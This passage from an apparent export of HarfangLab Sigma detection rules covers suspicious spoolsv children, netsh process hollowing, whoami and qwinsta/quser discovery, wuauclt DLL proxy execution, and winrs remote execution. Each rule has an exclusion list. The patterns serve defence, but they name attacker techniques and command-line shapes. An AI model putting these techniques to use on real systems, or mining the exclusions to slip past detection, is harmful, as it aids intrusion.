exclusion_system_sign:\n Image:\n - '?:\\Windows\\System32\\\\*'\n - '?:\\Windows\\SysWOW64\\\\*'\n Signed: 'true'\n Signature:\n - 'Microsoft Windows Hardware Compatibility Publisher'\n - 'Lexmark International, Inc.'\n - 'CANON INC.'\n - 'Dell Inc.'\n - 'Dell Incorporated'\n - 'SEIKO EPSON Corporation'\n - 'Brother Industries, ltd.'\n\n exclusion_temp_sign:\n Image: '?:\\Windows\\Temp\\\\*'\n Signed: 'true'\n Signature: 'Samsung Electronics CO., LTD.'\n\n exclusion_system32:\n Image: '?:\\Windows\\System32\\\\*'\n OriginalFileName:\n - 'FollowMeClientPortUI.exe'\n - 'GN__coms.exe'\n - 'HP*SM.dll' # (HP1100SM.dll, HPM1210SM.dll)\n - 'PortPopup.EXE'\n - 'zlm_zx.dll'\n - 'zsm_frontier.exe'\n - 'zshp1020.exe'\n\n exclusion_net:\n Image: '?:\\Windows\\System32\\net.exe'\n CommandLine|startswith: 'net start '\n\n exclusion_netsh:\n Image: '?:\\Windows\\System32\\netsh.exe'\n CommandLine|startswith: 'netsh firewall add portopening '\n\n exclusion_monitorui:\n Image: '?:\\Windows\\SysWOW64\\\\*.exe'\n OriginalFileName: 'MonitorUI.exe'\n\n exclusion_PDFCreator:\n Image|endswith:\n - '\\PDFCreator.exe'\n - '\\PDFCreator-cli.exe'\n - '\\PrintJobSource.exe'\n - '\\PDFSpool.exe'\n OriginalFileName:\n - 'PDFCreator.exe'\n - 'PDFCreator_pdfforge.exe'\n - 'PDFCreator_pdfforge2.exe'\n - 'PDFCreator_pdfforgeDL.exe'\n - 'PDFCreator-cli.exe'\n - 'PrintJobSource.exe'\n - 'PDFSpool.exe'\n\n exclusion_cpwsave:\n # C:\\Program Files (x86)\\Acro Software\\CutePDF Writer\\CPWSave.exe\n # C:\\Program Files (x86)\\CutePDF Writer\\CPWSave.exe\n Image|endswith: '\\CPWSave.exe'\n OriginalFileName: 'CPWSave.EXE'\n\n exclusion_multix:\n Image|endswith: '\\multix.exe'\n OriginalFileName: 'multix.exe'\n\n exclusion_gswin:\n Image|endswith: '\\gswin32c.exe'\n CommandLine: '*\\gswin32c.exe *pdfwrite* -sOutputFile=*'\n\n exclusion_seagfull:\n CommandLine: 'regsvr32.exe /s /c ssdal.dll'\n CurrentDirectory: '?:\\WINDOWS\\system32\\'\n\n exclusion_brother:\n Company: 'Brother Industries, Ltd.'\n OriginalFileName: 'MonitorUI.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows Hardware Compatibility Publisher'\n\n exclusion_dotnet:\n OriginalFileName: 'dw20.exe'\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n exclusion_hp:\n CommandLine:\n - 'regsvr32 /s hpbpro.dll'\n - 'regsvr32 /s hpboid.dll'\n - 'regsvr32 /s hpboidps.dll'\n - 'regsvr32 /s hpbmiapi.dll'\n - 'regsvr32 /s hpbprops.dll'\n CurrentDirectory: '?:\\WINDOWS\\system32\\'\n\n exclusion_ixbus:\n Image|contains: '\\ixbus\\'\n OriginalFileName: 'Spouleur.exe'\n Company: 'SRCI'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e62cf952-25f7-4ad2-b66c-70d6cdb5371d",
"rule_name": "Suspicious Process Spawned by spoolsv.exe",
"rule_description": "Detects the execution of a suspicious process by the Windows Print Spooler binary.\nThis can be the result of the exploitation of the CVE-2022-38028 vulnerability that allows attackers to escalate as SYSTEM.\nIt is recommended to investigate the process spawned by spoolsv.exe and other suspicious activities on the machine before this action.\n",
"rule_creation_date": "2024-04-23",
"rule_modified_date": "2025-10-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e65d4b07-e7f5-4ae6-a8d3-074bba289339",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296194Z",
"creation_date": "2026-03-23T11:45:35.296197Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296205Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_netsh.yml",
"content": "title: Netsh.exe Sacrificial Process Spawned\nid: e65d4b07-e7f5-4ae6-a8d3-074bba289339\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary netsh.exe, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate the parent process performing this action and the destination IP address of the netsh.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2026/02/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Netsh\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine:\n - '?:\\WINDOWS\\SysWOW64\\netsh.exe'\n - '?:\\WINDOWS\\System32\\netsh.exe'\n\n exclusion_programfiles:\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_pritunl:\n ParentImage|endswith: '\\pritunl-service.exe'\n\n exclusion_powershell:\n ParentImage:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\RuntimeBroker.exe'\n\n exclusion_windowsterminal:\n Ancestors|startswith: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|?:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_*\\WindowsTerminal.exe|?:\\Windows\\explorer.exe|?:\\Windows\\System32\\userinit.exe|?:\\Windows\\System32\\winlogon.exe|'\n\n exclusion_sihost:\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n GrandparentImage: '?:\\Windows\\System32\\svchost.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e65d4b07-e7f5-4ae6-a8d3-074bba289339",
"rule_name": "Netsh.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary netsh.exe, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the netsh.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2026-02-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e68503f8-c396-45ae-a06e-ce317227090f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295401Z",
"creation_date": "2026-03-23T11:45:35.295405Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295412Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_whoami_macos.yml",
"content": "title: Current Username Discovered via Whoami (macOS)\nid: e68503f8-c396-45ae-a06e-ce317227090f\ndescription: |\n Detects the execution of the whoami command.\n Attackers may use it during the discovery phase of an attack to retrieve the current account username.\n It is recommended to investigate for malicious behavior by the process and correlate this alert with any other discovery activity.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/whoami'\n ParentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage: '/Library/Application Support/TrendMicro/TmccMac/TMSMMonitor'\n\n exclusion_jamf:\n - ParentCommandLine|startswith: 'sh -c /usr/bin/whoami >& ?/Library/Application Support/JAMF/tmp/'\n - GrandparentImage: '/usr/local/jamf/bin/jamf'\n\n exclusion_zoom:\n ParentCommandLine: '/bin/bash /tmp/PKInstallSandbox.*/Scripts/us.zoom.pkg.videomeeting.*/postinstall /var/folders/*/us.zoom.ZoomDaemon.*/zoomTmp.pkg /Applications / /'\n\n exclusion_fxhome:\n ParentCommandLine: '/bin/bash /tmp/PKInstallSandbox.*/Scripts/com.fxhome.pkg.ArtlistBundle.ofxplugins.*/postinstall*'\n\n exclusion_warp:\n Ancestors: '/bin/zsh|/bin/zsh|/Applications/Warp.app/Contents/MacOS/stable|/Applications/Warp.app/Contents/MacOS/stable|/sbin/launchd'\n\n exclusion_wd_discovery:\n Ancestors|contains: '|/Applications/WD Discovery/WD Discovery.app/Contents/WDTrashObserver|'\n\n exclusion_fsecure:\n GrandparentImage: '/bin/bash /usr/local/f-secure/bin/fsupdated_guts2 --download'\n\n exclusion_globalprotect:\n ParentImage: '/Applications/GlobalProtect.app/Contents/Resources/PanGpHip'\n\n exclusion_homebrewshell:\n ParentImage:\n - '/opt/homebrew/Cellar/zsh/*/bin/zsh'\n - '/opt/homebrew/Cellar/fish/*/bin/fish'\n\n exclusion_withsecure:\n ParentImage: '/Library/WithSecure/bin/wsswupd.xpc/Contents/MacOS/wsswupd|/sbin/launchd'\n\n exclusion_wdthrash:\n GrandparentCommandLine: '/bin/bash -c pgrep -u \"$(whoami)\" -x WDTrashObserver'\n\n exclusion_trendmicro:\n ParentImage|startswith: '/Library/Application Support/TrendMicro/Tools/'\n\n exclusion_idea:\n GrandparentCommandLine: '/Applications/IntelliJ IDEA.app/Contents/MacOS/idea'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e68503f8-c396-45ae-a06e-ce317227090f",
"rule_name": "Current Username Discovered via Whoami (macOS)",
"rule_description": "Detects the execution of the whoami command.\nAttackers may use it during the discovery phase of an attack to retrieve the current account username.\nIt is recommended to investigate for malicious behavior by the process and correlate this alert with any other discovery activity.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e68bcbd8-7151-4ef4-8500-6fbf81efc0a0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.657787Z",
"creation_date": "2026-03-23T11:45:34.605611Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605619Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing",
"https://swarm.ptsecurity.com/remote-desktop-services-shadowing/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_rdp_session_discovery.yml",
"content": "title: Remote Session/User Information Listed\nid: e68bcbd8-7151-4ef4-8500-6fbf81efc0a0\ndescription: |\n Detects the execution of qwinsta or quser system binaries to list remote session information.\n Attackers may use these commands to discover users logged into a computer or to find sessions that can be hijacked.\n It is recommended to analyze the ancestors of the discovery command to look for malicious processes.\nreferences:\n - https://blog.bitsadmin.com/spying-on-users-using-rdp-shadowing\n - https://swarm.ptsecurity.com/remote-desktop-services-shadowing/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2023/08/21\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - attack.lateral_movement\n - attack.t1563.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_qwinsta:\n OriginalFileName: 'qwinsta.exe'\n CommandLine|contains: ' ?server'\n\n selection_quser:\n OriginalFileName: 'quser.exe'\n CommandLine|contains: ' ?server'\n\n selection_current_dir:\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\\\?Recycle.Bin\\'\n\n # This is handled by the rule b0b2818b-2803-4a79-b1f2-7a0f323fc955\n filter_query_user:\n ParentCommandLine|contains: 'query user'\n\n exclusion_local:\n CommandLine|contains: 'quser.exe /server:localhost'\n\n exclusion_ninja_rmm:\n ParentCommandLine|contains: '?:\\ProgramData\\NinjaRMMAgent\\scripting\\customscript_gen_*.ps1'\n\n exclusion_citrix:\n Ancestors|startswith: '?:\\Windows\\System32\\query.exe|?:\\Windows\\System32\\cmd.exe|?:\\Program Files (x86)\\Citrix\\Workspace Environment Management Agent\\VUEMCmdAgent.exe|?:\\Program Files (x86)\\Citrix\\Workspace Environment Management Agent\\Citrix.Wem.Agent.Service.exe|'\n\n exclusion_prometeus_windows_exporter:\n ProcessGrandparentCommandLine: 'powershell -file ?:\\Program Files\\windows_exporter\\disconnected_user_prom.ps1'\n\n exclusion_bisf:\n ProcessGrandparentCommandLine:\n - 'Powershell.exe -WindowStyle Maximize -file ?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\framework\\PrepBISF_Start.ps1'\n - 'Powershell.exe -WindowStyle Maximize -file ?:\\Program Files\\Base Image Script Framework (BIS-F)\\framework\\PrepBISF_Start.ps1'\n\n exclusion_fogservice:\n ProcessGrandparentImage:\n - '?:\\Program Files\\FOG\\FOGService.exe'\n - '?:\\Program Files (x86)\\FOG\\FOGService.exe'\n\n exclusion_generic_monitoring:\n ProcessGrandparentCommandLine:\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Script\\\\*.bat'\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Scripts\\\\*.bat'\n - '?:\\Windows\\system32\\cmd.exe /c \\\\\\\\*\\\\*$\\SCRIPT\\\\*.bat'\n - '?:\\Windows\\system32\\cmd.exe /c \\\\\\\\*\\\\*$\\SCRIPTS\\\\*.bat'\n - '?:\\WINDOWS\\system32\\cmd.exe /K \\\\\\\\*\\rdp$\\\\*.bat *'\n\n exclusion_zabbix:\n ParentCommandLine|contains: '?:\\Program Files\\Zabbix Agent 2\\zabbix-agent-scripts\\\\*.ps1'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_schedule:\n - ProcessParentCommandLine:\n - '?:\\Windows\\System32\\taskeng.exe'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentCommandLine:\n - '?:\\Windows\\System32\\taskeng.exe'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentParentCommandLine:\n - '?:\\Windows\\System32\\taskeng.exe'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - ProcessGrandparentGrandparentCommandLine:\n - '?:\\Windows\\System32\\taskeng.exe'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n\n # https://x.com/SBousseaden/status/1326652574150299649\n exclusion_runas:\n ProcessGrandparentCommandLine|contains: 'RunDll32.exe ?:\\Windows\\System32\\SHELL32.dll,RunAsNewUser_RunDLL Local\\{4ddb9f3f-700c-4bd6-9fc0-eaf85c01d25b}'\n\n condition: (selection_qwinsta or selection_quser) and selection_current_dir and not 1 of exclusion_* and not 1 of filter_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e68bcbd8-7151-4ef4-8500-6fbf81efc0a0",
"rule_name": "Remote Session/User Information Listed",
"rule_description": "Detects the execution of qwinsta or quser system binaries to list remote session information.\nAttackers may use these commands to discover users logged into a computer or to find sessions that can be hijacked.\nIt is recommended to analyze the ancestors of the discovery command to look for malicious processes.\n",
"rule_creation_date": "2023-08-21",
"rule_modified_date": "2026-03-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1563.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e695e27c-1cfb-4fc6-beb2-d33a10512974",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070680Z",
"creation_date": "2026-03-23T11:45:34.070682Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070686Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://dtm.uk/wuauclt/",
"https://www.malwarebytes.com/blog/news/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign",
"https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_suspicious_proxy_execution_wuauclt.yml",
"content": "title: Suspicious Proxy Execution via wuauclt.exe\nid: e695e27c-1cfb-4fc6-beb2-d33a10512974\ndescription: |\n Detects the use of Windows Update Client wuauclt.exe to gain code execution by specifying an arbitrary DLL.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to analyze the process responsible for the execution of wuauclt.exe to determine if it is being used in a legitimate context and investigate the DLL provided in the command-line to determine its legitimacy.\nreferences:\n - https://dtm.uk/wuauclt/\n - https://www.malwarebytes.com/blog/news/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign\n - https://lolbas-project.github.io/lolbas/Binaries/Wuauclt/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/01/25\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.s0108\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wuauclt\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n selection_command:\n # wuauclt.exe /UpdateDeploymentProvider /RunHandlerComServer\n CommandLine|contains|all:\n - '/UpdateDeploymentProvider'\n - '/RunHandlerComServer'\n\n exclusion_legitimate_parent:\n ParentCommandLine:\n - '?:\\Windows\\System32\\mousocoreworker.exe -Embedding'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wuauserv'\n\n # exclusion_legitimate_parent must be correct but sometime parent information are not present\n exclusion_commandline:\n CommandLine|endswith :\n # C:\\Windows\\system32\\wuauclt.exe /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId ffeefba3-ab95-41c1-94fa-8b880256b9c7 /RunHandlerComServer\n # \"C:\\Windows\\system32\\wuauclt.exe\" /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId f905a3e8-7300-4355-bc41-4af72965d2cf /RunHandlerComServer\n - ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll /ClassId ????????-????-????-????-???????????? /RunHandlerComServer'\n # C:\\WINDOWS\\system32\\wuauclt.exe /UpdateDeploymentProvider wuaueng.dll /RunHandlerComServer\n # \"C:\\Windows\\system32\\wuauclt.exe\" /UpdateDeploymentProvider wuaueng.dll /RunHandlerComServer\n - ' /UpdateDeploymentProvider wuaueng.dll /RunHandlerComServer'\n\n exclusion_mousocoreworker:\n ParentImage: '?:\\Windows\\System32\\MoUsoCoreWorker.exe'\n GrandparentCommandLine: '?:\\windows\\system32\\svchost.exe -k DcomLaunch -p'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e695e27c-1cfb-4fc6-beb2-d33a10512974",
"rule_name": "Suspicious Proxy Execution via wuauclt.exe",
"rule_description": "Detects the use of Windows Update Client wuauclt.exe to gain code execution by specifying an arbitrary DLL.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to analyze the process responsible for the execution of wuauclt.exe to determine if it is being used in a legitimate context and investigate the DLL provided in the command-line to determine its legitimacy.\n",
"rule_creation_date": "2022-01-25",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e6b9469d-5088-46a6-a7f4-26d176eb8bde",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627259Z",
"creation_date": "2026-03-23T11:45:34.627261Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627265Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1218_winrs.yml",
"content": "title: Execution on Remote Host via Winrs\nid: e6b9469d-5088-46a6-a7f4-26d176eb8bde\ndescription: |\n Detects the execution of Winrs.exe to possibly execute malicious binaries on a remote host.\n This binary, which is digitally signed by Microsoft, is supposed to be used as a (remote) administrative tool.\n Attackers may abused it to bypass security restrictions.\n It is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Winrs process.\nreferences:\n - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2022/12/04\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.lateral_movement\n - attack.t1021.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - OriginalFileName: 'winrs.exe'\n - Image|endswith: '\\winrs.exe'\n\n selection_commandline:\n CommandLine|contains:\n - ' /remote:'\n - ' -remote:'\n - ' /r:'\n - ' -r:'\n\n # This is handled by the rule 734b213f-25e3-402d-862b-ccbe5a1166f4\n exclusion_local:\n CommandLine|contains:\n - '127.0.0.1'\n - 'localhost'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e6b9469d-5088-46a6-a7f4-26d176eb8bde",
"rule_name": "Execution on Remote Host via Winrs",
"rule_description": "Detects the execution of Winrs.exe to possibly execute malicious binaries on a remote host.\nThis binary, which is digitally signed by Microsoft, is supposed to be used as a (remote) administrative tool.\nAttackers may abused it to bypass security restrictions.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Winrs process.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e6bfc159-5271-4835-a319-0f1d4cea23c7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083606Z",
"creation_date": "2026-03-23T11:45:34.083608Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083612Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_dnscmd_discovery.yml",
